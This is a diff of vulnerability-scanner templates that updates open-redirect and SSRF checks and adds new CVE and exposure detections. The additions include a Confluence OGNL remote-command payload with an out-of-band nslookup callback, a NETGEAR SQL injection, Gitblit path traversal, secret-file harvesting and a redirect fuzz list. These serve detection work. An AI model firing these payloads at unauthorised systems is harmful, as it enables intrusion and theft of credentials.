- "{{BaseURL}}/ads/www/delivery/lg.php?dest=http://interact.sh"
- "{{BaseURL}}/adserve/www/delivery/lg.php?dest=http://interact.sh"
- "{{BaseURL}}/adserver/www/delivery/lg.php?dest=http://interact.sh"
- "{{BaseURL}}/openx/www/delivery/lg.php?dest=http://interact.sh"
- "{{BaseURL}}/revive/www/delivery/lg.php?dest=http://interact.sh"
- "{{BaseURL}}/www/delivery/lg.php?dest=http://interact.sh"
stop-at-first-match: true
redirects: true
@ -37,5 +37,5 @@ requests:
- 200
- type: word
words:
- "<title>Example Domain</title>"
- "<h1> Interactsh Server </h1>"
part: body

View File

@ -22,10 +22,10 @@ info:
requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/phastpress/phast.php?service=scripts&src=https%3A%2F%2Fexample.com"
- "{{BaseURL}}/wp-content/plugins/phastpress/phast.php?service=scripts&src=https%3A%2F%2Finteract.sh"
matchers:
- type: regex
regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$'
- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$'
part: header

View File

@ -18,10 +18,10 @@ info:
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?page=acymailing_front&ctrl=frontusers&noheader=1&user[email]=example@mail.com&ctrl=frontusers&task=subscribe&option=acymailing&redirect=https://example.com&ajax=0&acy_source=widget%202&hiddenlists=1&acyformname=formAcym93841&acysubmode=widget_acym"
- "{{BaseURL}}/index.php?page=acymailing_front&ctrl=frontusers&noheader=1&user[email]=example@mail.com&ctrl=frontusers&task=subscribe&option=acymailing&redirect=https://interact.sh&ajax=0&acy_source=widget%202&hiddenlists=1&acyformname=formAcym93841&acysubmode=widget_acym"
matchers:
- type: regex
regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$'
- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$'
part: header

View File

@ -23,7 +23,7 @@ requests:
Host: {{Hostname}}
- |
GET /wp-login.php?action=theplusrp&key=&redirecturl=http://attacker.com&forgoturl=http://attacker.com&login={{username}} HTTP/1.1
GET /wp-login.php?action=theplusrp&key=&redirecturl=http://interact.sh&forgoturl=http://interact.sh&login={{username}} HTTP/1.1
Host: {{Hostname}}
redirects: true
@ -31,7 +31,7 @@ requests:
- type: regex
part: header
regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)attacker\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
extractors:
- type: regex

View File

@ -19,12 +19,12 @@ info:
requests:
- method: GET
path:
- "{{BaseURL}}/community/?foro=signin&redirect_to=https://example.com/"
- "{{BaseURL}}/community/?foro=signin&redirect_to=https://interact.sh/"
matchers:
- type: regex
regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$'
- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$'
part: header
# Enhanced by mp on 2022/04/13

View File

@ -19,14 +19,14 @@ info:
requests:
- method: GET
path:
- "{{BaseURL}}/wp-json/anycomment/v1/auth/wordpress?redirect=https://example.com"
- "{{BaseURL}}/wp-json/anycomment/v1/auth/wordpress?redirect=https://interact.sh"
matchers-condition: and
matchers:
- type: regex
part: header
regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
- type: status
status:

View File

@ -19,12 +19,12 @@ info:
requests:
- method: GET
path:
- "{{BaseURL}}/wp-admin/admin.php?page=wp_ajax_rsvp-form&tribe_tickets_redirect_to=https://example.com"
- "{{BaseURL}}/wp-admin/admin.php?page=wp_ajax_rsvp-form&tribe_tickets_redirect_to=https://interact.sh"
matchers:
- type: regex
part: header
regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
# Enhanced by mp on 2022/04/13

View File

@ -19,12 +19,12 @@ info:
requests:
- method: GET
path:
- "{{BaseURL}}/?noptin_ns=email_click&to=https://example.com"
- "{{BaseURL}}/?noptin_ns=email_click&to=https://interact.sh"
matchers:
- type: regex
part: header
regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
# Enhanced by mp on 2022/04/13

View File

@ -18,12 +18,12 @@ info:
requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/webp-converter-for-media/includes/passthru.php?src=https://example.com"
- "{{BaseURL}}/wp-content/plugins/webp-converter-for-media/includes/passthru.php?src=https://interact.sh"
matchers:
- type: regex
part: header
regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
# Enhanced by mp on 2022/04/21

View File

@ -17,10 +17,10 @@ info:
requests:
- method: GET
path:
- "{{BaseURL}}/wp-admin/admin-ajax.php?action=heartbeat&admin_custom_language_toggle=1&admin_custom_language_return_url=https://example.com"
- "{{BaseURL}}/wp-admin/admin-ajax.php?action=heartbeat&admin_custom_language_toggle=1&admin_custom_language_return_url=https://interact.sh"
matchers:
- type: regex
part: header
regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)attacker\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1

View File

@ -19,7 +19,7 @@ info:
requests:
- method: GET
path:
- "{{BaseURL}}/test.txt%0d%0aSet-Cookie:CRLFInjection=Test%0d%0aLocation:%20example.com%0d%0aX-XSS-Protection:0"
- "{{BaseURL}}/test.txt%0d%0aSet-Cookie:CRLFInjection=Test%0d%0aLocation:%20interact.sh%0d%0aX-XSS-Protection:0"
matchers-condition: and
matchers:
@ -32,7 +32,7 @@ requests:
words:
- "Content-Disposition: attachment;filename=test.txt"
- "Set-Cookie:CRLFInjection=Test"
- "Location: example.com"
- "Location: interact.sh"
- "X-XSS-Protection:0"
part: header
condition: and

View File

@ -0,0 +1,33 @@
id: CVE-2021-27748
info:
name: IBM WebSphere Portal SSRF
author: pdteam
severity: high
description: |
A Server Side Request Forgery vulnerability affects HCL Digital Experience, on-premise deployments and containers.
reference:
- https://blog.assetnote.io/2021/12/26/chained-ssrf-websphere/
- https://support.hcltechsw.com/csm?id=kb_article&sysparm_article=KB0095665
classification:
cve-id: CVE-2021-27748
tags: cve,cve2021,hcl,ibm,ssrf,websphere
requests:
- method: GET
path:
- '{{BaseURL}}/docpicker/internal_proxy/http/interact.sh'
- '{{BaseURL}}/wps/PA_WCM_Authoring_UI/proxy/http/interact.sh'
redirects: true
max-redirects: 2
stop-at-first-match: true
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "<h1> Interactsh Server </h1>"

View File

@ -27,7 +27,7 @@ requests:
Connection: close
- |
GET /solr/{{core}}/replication/?command=fetchindex&masterUrl=https://example.com HTTP/1.1
GET /solr/{{core}}/replication/?command=fetchindex&masterUrl=https://interact.sh HTTP/1.1
Host: {{Hostname}}
Accept-Language: en
Connection: close

View File

@ -19,10 +19,10 @@ info:
requests:
- method: GET
path:
- "{{BaseURL}}/new/newhttp://example.com"
- "{{BaseURL}}/new/newhttp://interact.sh"
matchers:
- type: regex
regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$'
- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$'
part: header

View File

@ -6,7 +6,7 @@ info:
severity: medium
description: There is code in FS to validate that the url specified in the next parameter is either relative OR has the same netloc (network location) as the requesting URL. This check utilizes Pythons urlsplit
library. However many browsers are very lenient on the kind of URL they accept and 'fill in the blanks' when presented with a possibly incomplete URL. As a concrete example - setting http://login?next=\\\github.com
will pass FS's relative URL check however many browsers will gladly convert this to http://example.com.
will pass FS's relative URL check however many browsers will gladly convert this to http://interact.sh.
reference:
- https://github.com/Flask-Middleware/flask-security/security/advisories/GHSA-6qmf-fj6m-686c
- https://github.com/Flask-Middleware/flask-security/issues/486
@ -21,10 +21,10 @@ info:
requests:
- method: GET
path:
- '{{BaseURL}}/login?next=\\\example.com'
- '{{BaseURL}}/login?next=\\\interact.sh'
matchers:
- type: regex
part: header
regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1

View File

@ -20,7 +20,7 @@ info:
requests:
- raw:
- |+
GET /\u001B]8;;https://example.com"/onmouseover="alert(1)\u0007example\u001B]8;;\u0007 HTTP/1.1
GET /\u001B]8;;https://interact.sh"/onmouseover="alert(1)\u0007example\u001B]8;;\u0007 HTTP/1.1
Host: {{Hostname}}
Connection: close
@ -34,6 +34,6 @@ requests:
- type: word
words:
- "com\"/onmouseover=\"alert(1)\">"
- "sh\"/onmouseover=\"alert(1)\">"
# Enhanced by mp on 2022/04/21

View File

@ -20,10 +20,10 @@ info:
requests:
- method: GET
path:
- "{{BaseURL}}/ssoAdapter/logoutAction.do?servProvCode=SAFVC&successURL=https://example.com/"
- "{{BaseURL}}/ssoAdapter/logoutAction.do?servProvCode=SAFVC&successURL=https://interact.sh/"
matchers:
- type: regex
regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$'
- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$'
part: header

View File

@ -34,11 +34,11 @@ requests:
-----------------------------138742543134772812001999326589
Content-Disposition: form-data; name="reg_email"
{{randstr}}@example.com
{{randstr}}@interact.sh
-----------------------------138742543134772812001999326589
Content-Disposition: form-data; name="reg_password"
{{randstr}}@example.com
{{randstr}}@interact.sh
-----------------------------138742543134772812001999326589
Content-Disposition: form-data; name="reg_password_present"
@ -46,11 +46,11 @@ requests:
-----------------------------138742543134772812001999326589
Content-Disposition: form-data; name="reg_first_name"
{{randstr}}@example.com
{{randstr}}@interact.sh
-----------------------------138742543134772812001999326589
Content-Disposition: form-data; name="reg_last_name"
{{randstr}}@example.com
{{randstr}}@interact.sh
-----------------------------138742543134772812001999326589
Content-Disposition: form-data; name="_wp_http_referer"
@ -89,7 +89,7 @@ requests:
Origin: {{BaseURL}}
Referer: {{BaseURL}}
log={{randstr}}@example.com&pwd={{randstr}}@example.com&wp-submit=Log+In
log={{randstr}}@interact.sh&pwd={{randstr}}@interact.sh&wp-submit=Log+In
- |
GET /wp-admin/ HTTP/1.1

View File

@ -21,13 +21,13 @@ requests:
- method: GET
path:
- '{{BaseURL}}//example.com/%2f..'
- '{{BaseURL}}//interact.sh/%2f..'
matchers-condition: and
matchers:
- type: regex
regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$'
- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$'
part: header
- type: status

View File

@ -20,12 +20,12 @@ requests:
- method: GET
path:
- '{{BaseURL}}/index.php?m=user&c=Users&a=logout&referurl=https://example.com'
- '{{BaseURL}}/index.php?m=user&c=Users&a=logout&referurl=https://interact.sh'
matchers:
- type: regex
part: header
regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_]*\.)?example\.com(?:\s*?)$'
- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_]*\.)?interact\.sh(?:\s*?)$'
# Enhanced by mp on 2022/03/16

View File

@ -19,7 +19,7 @@ info:
requests:
- method: GET
path:
- "{{BaseURL}}/auth/logout?continue=//example.com"
- "{{BaseURL}}/auth/logout?continue=//interact.sh"
matchers-condition: and
matchers:
@ -33,6 +33,6 @@ requests:
- type: regex
part: header
regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$'
- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$'
# Enhanced by mp on 2022/02/27

View File

@ -21,14 +21,14 @@ requests:
- |
GET / HTTP/1.1
Host: {{Hostname}}
X-Forwarded-Host: //example.com
X-Forwarded-Host: //interact.sh
matchers-condition: and
matchers:
- type: regex
part: header
regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$'
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$'
- type: status
status:

View File

@ -19,7 +19,7 @@ info:
requests:
- method: GET
path:
- "{{BaseURL}}/lab.html?vpath=//example.com"
- "{{BaseURL}}/lab.html?vpath=//interact.sh"
matchers:
- type: regex

View File

@ -22,10 +22,10 @@ info:
requests:
- method: GET
path:
- '{{BaseURL}}/boafrm/formWlanRedirect?redirect-url=http://example.com&wlan_id=1'
- '{{BaseURL}}/boafrm/formWlanRedirect?redirect-url=http://interact.sh&wlan_id=1'
matchers:
- type: regex
part: header
regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1

View File

@ -17,10 +17,10 @@ info:
requests:
- method: GET
path:
- "{{BaseURL}}/wp-admin/admin-ajax.php?action=kc_get_thumbn&id=https://example.com"
- "{{BaseURL}}/wp-admin/admin-ajax.php?action=kc_get_thumbn&id=https://interact.sh"
matchers:
- type: regex
part: header
regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$'
- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$'

View File

@ -20,12 +20,12 @@ info:
requests:
- method: GET
path:
- '{{BaseURL}}/index.php/example.com'
- '{{BaseURL}}/index.php/interact.sh'
matchers:
- type: regex
part: header
regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
# Enhanced by mp on 2022/03/08

View File

@ -0,0 +1,44 @@
id: CVE-2022-26134
info:
name: Confluence - Remote Code Execution via OGNL template injection
author: pdteam,jbertman
severity: critical
description: |
Critical severity unauthenticated remote code execution vulnerability in Confluence Server and Data Center.
reference:
- https://attackerkb.com/topics/BH1D56ZEhs/cve-2022-26134/rapid7-analysis
- https://confluence.atlassian.com/doc/confluence-security-advisory-2022-06-02-1130377146.html
- https://www.rapid7.com/blog/post/2022/06/02/active-exploitation-of-confluence-cve-2022-26134/
- https://jira.atlassian.com/browse/CONFSERVER-79016
classification:
cve-id: CVE-2022-26134
metadata:
shodan-query: http.component:"Atlassian Confluence"
tags: cve,cve2022,confluence,rce,ognl,oast
requests:
- method: GET
path:
- "{{BaseURL}}/%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22whoami%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D/"
- "{{BaseURL}}/%24%7B%40java.lang.Runtime%40getRuntime%28%29.exec%28%22nslookup%20{{interactsh-url}}%22%29%7D/"
stop-at-first-match: true
req-condition: true
matchers-condition: or
matchers:
- type: dsl
dsl:
- 'contains(to_lower(all_headers_1), "x-cmd-response:")'
- type: dsl
dsl:
- 'contains(interactsh_protocol, "dns")'
- 'contains(to_lower(response_2), "confluence")'
condition: and
extractors:
- type: kval
part: header
kval:
- "x_cmd_response"

View File

@ -0,0 +1,44 @@
id: CVE-2022-29383
info:
name: NETGEAR ProSafe SSL VPN firmware - SQL Injection
author: elitebaz
severity: critical
description: |
NETGEAR ProSafe SSL VPN multiple firmwares were discovered to contain a SQL injection vulnerability via USERDBDomains.Domainname at cgi-bin/platform.cgi.
reference:
- http://cve.mitre.org/cgi-bin/cvename.cgi?name=2022-29383
- https://nvd.nist.gov/vuln/detail/CVE-2022-29383
- https://github.com/badboycxcc/Netgear-ssl-vpn-20211222-CVE-2022-29383
- https://github.com/badboycxcc/Netgear-ssl-vpn-20211222
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2022-29383
metadata:
verified: "true"
tags: cve,cve2022,sqli,netgear,router
requests:
- raw:
- |
POST /scgi-bin/platform.cgi HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded; charset=utf-8
thispage=index.htm&USERDBUsers.UserName=NjVI&USERDBUsers.Password=&USERDBDomains.Domainname=geardomain'+AND+'5434'%3d'5435'+AND+'MwLj'%3d'MwLj&button.login.USERDBUsers.router_status=Login&Login.userAgent=MDpd
- |
POST /scgi-bin/platform.cgi HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded; charset=utf-8
thispage=index.htm&USERDBUsers.UserName=NjVI&USERDBUsers.Password=&USERDBDomains.Domainname=geardomain'+AND+'5434'%3d'5434'+AND+'MwLj'%3d'MwLj&button.login.USERDBUsers.router_status=Login&Login.userAgent=MDpd
req-condition: true
matchers:
- type: dsl
dsl:
- contains(body_1, "User authentication Failed")
- contains(body_2, "User Login Failed for SSLVPN User.")
condition: and

View File

@ -0,0 +1,46 @@
id: CVE-2022-31268
info:
name: Gitblit 1.9.3 - Path traversal
author: 0x_Akoko
severity: high
description: |
A Path Traversal vulnerability in Gitblit 1.9.3 can lead to reading website files via /resources//../ (e.g., followed by a WEB-INF or META-INF pathname).
reference:
- https://github.com/metaStor/Vuls/blob/main/gitblit/gitblit%20V1.9.3%20path%20traversal/gitblit%20V1.9.3%20path%20traversal.md
- https://www.cvedetails.com/cve/CVE-2022-31268
- https://vuldb.com/?id.200500
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2022-31268
cwe-id: CWE-22
metadata:
shodan-query: http.html:"Gitblit"
verified: "true"
tags: cve,cve2022,lfi,gitblit
requests:
- method: GET
path:
- "{{BaseURL}}/resources//../WEB-INF/web.xml"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "</web-app>"
- "java.sun.com"
- "gitblit.properties"
condition: and
- type: word
part: header
words:
- "application/xml"
- type: status
status:
- 200

View File

@ -0,0 +1,34 @@
id: eventum-panel
info:
name: Eventum Panel Detect
author: princechaddha
severity: info
metadata:
verified: true
shodan-query: http.favicon.hash:305412257
tags: panel,eventum
requests:
- method: GET
path:
- "{{BaseURL}}"
redirects: true
max-redirects: 2
matchers-condition: or
matchers:
- type: word
part: body
words:
- '<title>Login - Eventum</title>'
- 'title="Eventum Issues search"'
condition: or
- type: word
part: body
words:
- 'Database Error:'
- 'There seems to be a problem connecting to the database server specified in your configuration file'
condition: and

View File

@ -2,23 +2,38 @@ id: zte-panel
info:
name: ZTE Panel
author: github.com/its0x08
author: its0x08,idealphase
severity: info
description: |
ZTE Corporation is a global leader in telecommunications and information technology. Founded in 1985 and listed on both the Hong Kong and Shenzhen Stock Exchanges, the company has been committed to providing innovative technologies and integrated solutions for global operators, government and enterprise, and consumers from over 160 countries across the globe.ZTE Corporation is a global leader in telecommunications and information technology. Founded in 1985 and listed on both the Hong Kong and Shenzhen Stock Exchanges, the company has been committed to providing innovative technologies and integrated solutions for global operators, government and enterprise, and consumers from over 160 countries across the globe.
reference:
- https://www.zte.com.cn/global/
metadata:
verified: true
shodan-query: http.html:"ZTE Corporation"
tags: panel,zte
requests:
- method: GET
path:
- "{{BaseURL}}"
matchers:
- type: word
part: body
words:
- "ZTE Corporation. All rights reserved. </div>"
- '<form name="fLogin" id="fLogin" method="post" onsubmit="return false;" action="">'
part: body
condition: and
- type: word
part: header
words:
- "Mini web server 1.0 ZTE corp 2005."
part: header
extractors:
- type: regex
part: body
group: 1
regex:
- '<div class="type"><font id="">(.+)<\/font><\/div>'

View File

@ -0,0 +1,33 @@
id: appsettings-file-disclosure
info:
name: Application Setting file disclosure
author: DhiyaneshDK,tess
severity: high
description: |
appsetting.json file discloses the DB connection strings containing sensitive information.
reference:
- https://twitter.com/hacker_/status/1518003548855930882?s=20&t=BVauK0yUjVl5yL7rwy0Eag
metadata:
verified: true
tags: exposure
requests:
- method: GET
path:
- "{{BaseURL}}/appsettings.json"
matchers-condition: and
matchers:
- type: word
words:
- "ConnectionStrings"
- type: word
part: header
words:
- "application/json"
- type: status
status:
- 200

View File

@ -0,0 +1,46 @@
id: django-secret-key
info:
name: Django Secret Key Exposure
author: geeknik,DhiyaneshDk
severity: high
reference: https://docs.gitguardian.com/secrets-detection/detectors/specifics/django_secret_key
metadata:
verified: true
shodan-query: html:settings.py
tags: django,exposure
requests:
- method: GET
path:
- "{{BaseURL}}/settings.py"
- "{{BaseURL}}/app/settings.py"
- "{{BaseURL}}/django/settings.py"
- "{{BaseURL}}/settings/settings.py"
- "{{BaseURL}}/web/settings/settings.py"
stop-at-first-match: true
matchers-condition: and
matchers:
- type: word
part: body
words:
- "SECRET_KEY ="
- type: word
part: header
words:
- "text/html"
negative: true
- type: status
status:
- 200
extractors:
- type: regex
part: body
group: 1
regex:
- '"DJANGO_SECRET_KEY", "(.*)"'

View File

@ -0,0 +1,29 @@
id: ftpconfig
info:
name: Atom remote-ssh ftpconfig Exposure
author: geeknik,DhiyaneshDK
description: Created by remote-ssh for Atom, contains SFTP/SSH server details and credentials
severity: high
metadata:
verified: true
shodan-query: html:ftpconfig
tags: atom,ftp,config,exposure
requests:
- method: GET
path:
- "{{BaseURL}}/.ftpconfig"
matchers-condition: and
matchers:
- type: word
words:
- '"protocol":'
- '"host":'
- '"user":'
condition: and
- type: status
status:
- 200

View File

@ -0,0 +1,33 @@
id: git-mailmap
info:
name: Git Mailmap File Disclosure
author: geeknik,DhiyaneshDK
severity: low
reference: https://man7.org/linux/man-pages/man5/gitmailmap.5.html
metadata:
verified: true
shodan-query: html:mailmap
tags: config,exposure,git,mailmap
requests:
- method: GET
path:
- "{{BaseURL}}/.mailmap"
matchers-condition: and
matchers:
- type: regex
regex:
- "(?:[a-z0-9!#$%&'*+/=?^_`{|}~-]+(?:\\.[a-z0-9!#$%&'*+/=?^_`{|}~-]+)*|\"(?:[\\x01-\\x08\\x0b\\x0c\\x0e-\\x1f\\x21\\x23-\\x5b\\x5d-\\x7f]|\\\\[\\x01-\\x09\\x0b\\x0c\\x0e-\\x7f])*\")@(?:(?:[a-z0-9](?:[a-z0-9-]*[a-z0-9])?\\.)+[a-z0-9](?:[a-z0-9-]*[a-z0-9])?|\\[(?:(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\\.){3}(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?|[a-z0-9-]*[a-z0-9]:(?:[\\x01-\\x08\\x0b\\x0c\\x0e-\\x1f\\x21-\\x5a\\x53-\\x7f]|\\\\[\\x01-\\x09\\x0b\\x0c\\x0e-\\x7f])+)\\])"
- type: word
part: body
words:
- "# Theresa O'Connor:"
negative: true
- type: status
status:
- 200

View File

@ -0,0 +1,32 @@
id: php-ini
info:
name: Php.ini File Disclosure
author: geeknik,DhiyaneshDK
severity: low
reference: https://www.php.net/manual/en/configuration.file.php
metadata:
verified: true
shodan-query: php.ini
tags: config,exposure
requests:
- method: GET
path:
- "{{BaseURL}}/php.ini"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "[PHP]"
- "short_open_tag"
- "safe_mode"
- "expose_php"
condition: and
- type: status
status:
- 200

View File

@ -11,10 +11,10 @@ info:
requests:
- method: GET
path:
- '{{BaseURL}}//example.com/%2F..'
- '{{BaseURL}}//interact.sh/%2F..'
matchers:
- type: regex
part: header
regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1

View File

@ -13,7 +13,7 @@ self-contained: true
requests:
- method: GET
path:
- "https://api.debounce.io/v1/?api={{token}}&email=test@example.com"
- "https://api.debounce.io/v1/?api={{token}}&email=test@interact.sh"
matchers:
- type: word

View File

@ -15,7 +15,7 @@ self-contained: true
requests:
- method: GET
path:
- https://fullhunt.io/api/v1/domain/example.com/details
- https://fullhunt.io/api/v1/domain/interact.sh/details
headers:
X-API-Key: "{{token}}"

View File

@ -14,7 +14,7 @@ self-contained: true
requests:
- method: GET
path:
- https://sslmate.com/api/v2/certs/example.com?expand=current.crt
- https://sslmate.com/api/v2/certs/interact.sh?expand=current.crt
headers:
Authorization: Bearer {{token}}

View File

@ -13,9 +13,9 @@ requests:
- raw:
- |
GET /?{{randstr}}=9 HTTP/1.1
X-Forwarded-Prefix: prefix.cache.example.com
X-Forwarded-Host: host.cache.example.com
X-Forwarded-For: for.cache.example.com
X-Forwarded-Prefix: prefix.cache.interact.sh
X-Forwarded-Host: host.cache.interact.sh
X-Forwarded-For: for.cache.interact.sh
- |
GET /?{{randstr}}=9 HTTP/1.1
@ -24,10 +24,10 @@ requests:
matchers:
- type: dsl
dsl:
- 'contains(body_2, "cache.example.com")'
- 'contains(body_2, "cache.interact.sh")'
extractors:
- type: regex
part: response
regex:
- "(prefix|host|for).cache.example.com"
- "(prefix|host|for).cache.interact.sh"

View File

@ -15,94 +15,94 @@ requests:
payloads:
redirect:
- '%0a/example.com/'
- '%0d/example.com/'
- '%00/example.com/'
- '%09/example.com/'
- '%5C%5Cexample.com/%252e%252e%252f'
- '%5Cexample.com'
- '%5cexample.com/%2f%2e%2e'
- '%5c{{RootURL}}example.com/%2f%2e%2e'
- '../example.com'
- '.example.com'
- '/%5cexample.com'
- '////\;@example.com'
- '////example.com'
- '///example.com'
- '///example.com/%2f%2e%2e'
- '///example.com@//'
- '///{{RootURL}}example.com/%2f%2e%2e'
- '//;@example.com'
- '//\/example.com/'
- '//\@example.com'
- '//\example.com'
- '//\texample.com/'
